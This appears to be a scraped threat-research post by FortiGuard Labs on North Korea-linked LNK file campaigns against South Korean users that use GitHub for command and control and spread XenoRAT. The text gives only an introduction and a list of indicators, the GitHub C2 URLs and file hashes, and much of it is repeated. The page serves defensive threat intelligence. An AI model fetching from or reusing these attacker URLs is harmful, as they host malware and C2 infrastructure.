DPRK-Related Campaigns with LNK and GitHub C2
Contents
FortiGuard Labs Threat Research
DPRK-Related Campaigns with LNK and GitHub C2
How DPRK actors use LNK files and GitHub C2 to evade detection and maintain persistence
FortiGuard Security Portfolio 2025 Threat Landscape ReportAffected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Stolen data may be leveraged for follow-on attacks
Severity Level: High
FortiGuard Labs recently detected a series of LNK files targeting users in South Korea. These attacks use a multi-stage scripting process and leverage GitHub as Command and Control (C2) infrastructure to evade detection. Although these LNK files can be traced back to 2024, earlier versions had less obfuscation and contained significant metadata, allowing us to track similar attacks spreading the XenoRAT malware.
In recent months, the threat actor has altered their tactics. They now embed decoding functions within LNK arguments and include encoded payloads directly inside the files. Based on the decoy PDF titles we collected, the attacker seems to be targeting various companies in Korea …
DPRK-Related Campaigns with LNK and GitHub C2
How DPRK actors use LNK files and GitHub C2 to evade detection and maintain persistence
FortiGuard Security Portfolio 2025 Threat Landscape ReportAffected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Stolen data may be leveraged for follow-on attacks
Severity Level: High
FortiGuard Labs recently detected a series of LNK files targeting users in South Korea. These attacks use a multi-stage scripting process and leverage GitHub as Command and Control (C2) infrastructure to evade detection. Although these LNK files can be traced back to 2024, earlier versions had less obfuscation and contained significant metadata, allowing us to track similar attacks spreading the XenoRAT malware.
In recent months, the threat actor has altered their tactics. They now embed decoding functions within LNK arguments and include encoded payloads directly inside the files. Based on the decoy PDF titles we collected, the attacker seems to be targeting various companies in Korea …
IoC
https://api.github.com/repos/motoralis
https://raw.githubusercontent.com/motoralis/singled/main/kcca/paper.jim
https://api.github.com/repos/motoralis/singled/contents/jjyun/network/<Date
https://api.github.com/repos/motoralis/singled/contents/kcca/technik
c0866bb72c7a12a0288f434e16ba14eeaa35d3c4cff4a86046c553c15679c0b5
484a16d779d67c7339125ceac10b9abf1aa47f561f40058789bfe2acda548282
af0309aa38d067373c54b2a7774a32f68ab72cb2dbf5aed74ac784b079830184
9c3f2bd300ad2ef8584cc48adc47aab61bf85fc653d923e106c73fc6ec3ea1dc
f20fde3a9381c22034f7ecd4fef2396a85c05bfd54f7db3ad6bcd00c9e09d421
https://raw.githubusercontent.com/motoralis/singled/main/kcca/paper.jim
https://api.github.com/repos/motoralis/singled/contents/jjyun/network/<Date
https://api.github.com/repos/motoralis/singled/contents/kcca/technik
c0866bb72c7a12a0288f434e16ba14eeaa35d3c4cff4a86046c553c15679c0b5
484a16d779d67c7339125ceac10b9abf1aa47f561f40058789bfe2acda548282
af0309aa38d067373c54b2a7774a32f68ab72cb2dbf5aed74ac784b079830184
9c3f2bd300ad2ef8584cc48adc47aab61bf85fc653d923e106c73fc6ec3ea1dc
f20fde3a9381c22034f7ecd4fef2396a85c05bfd54f7db3ad6bcd00c9e09d421